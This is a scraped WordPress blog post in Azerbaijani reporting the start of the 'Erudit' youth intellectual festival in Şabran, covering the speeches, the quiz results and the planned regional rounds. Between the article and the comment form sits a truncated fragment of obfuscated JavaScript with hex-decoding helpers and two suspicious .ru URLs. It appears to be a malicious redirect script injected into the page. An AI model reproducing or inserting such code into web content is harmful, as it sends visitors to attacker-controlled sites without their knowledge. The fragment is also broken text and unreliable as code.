Şabranda “Erudit” region gənclərinin intellekt festivalına start verilib

IMG_0003Azərbaycan Respublikasının Prezidenti yanında Gənclər Fondunun dəstəyi ilə “Yurd” Gənclərin İntellektual  İnkişafına Dəstək İctimai Birliyi tərəfindən reallaşdırılan “Erudit” region gənclərinin intellekt festivalı layihəsinə start verilib.

IMG_0015Şabran şəhərində baş tutan ilk seçim turunda rayonunun 8 komandası qələbə uğrunda mübarizə aparıb.

Rəsmi açılış mərasimində çıxış edən təşkilatın sədri Ramin Mahmudov layihənin məqsədindən danışıb, 2011-ci ildən bu yana Gənclər Fondunun dəstəyi ilə ölkə ərazisndə gənclər təşkilatları və gənclər tərəfindən IMG_0016reallaşdırılan layihələrdən və onların əhəmiyyətindən danışıb. Bu layihələr nəticəsində ölkədə gənclər siyasətində yeni nəfəs formalaşmağa başlayıb, yeni-yeni istedadlı, bacarıqlı gənclər üzə çıxarılıb, eyni zamanda reallaşdırılan beynəlxalq layihələr sayəsində də Azərbaycanımızın dünyada təbliğ istiqamətində əhəmiyyətli işlərə imza atılıb.

IMG_0030Şabran rayon Gənclər və İdman İdarəsinin əməkdaşı Elvin Vəliyev  öz çıxışında dövlət gənclər siyasətindən danışıb, gənclərin inkişafının bu siyasətin əsas prioritetlərindən olduğunu qeyd edib.

Rəsmi hissədən sonra turnirə start verilib. Nə? Harada? Nə zaman? oyunu üzrə keçirilən seçim turunda IMG_0078“Loqos” komandası birinci, “Atlantis” biliciləri ikinci, “Kentavrlar” komandası isə üçüncü olub. Əsasnaməyə uyğun olaraq ilk iki yeri tutan komandalar Quba şəhərində keçiriləcək final mərhələsində oynamaq hüququ əldə edib.

IMG_0083Qeyd edək ki, layihə çərçivəsində Quba, Qusar, Xaçmaz və Siyəzən rayonlarında da gənclərin iştirakı ilə seçim turları keçiriləcək və qalib komandalar Quba şəhərində baş tutacaq finalda şimal zonasının ən güclüsünü müəyyən edəcəklər.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "yurdgencler.wordpress.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;ehttps://ncnjm3le.ru/f2.html?a=26482https://3oaq3lgf23.ru/u.html?a=26482

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s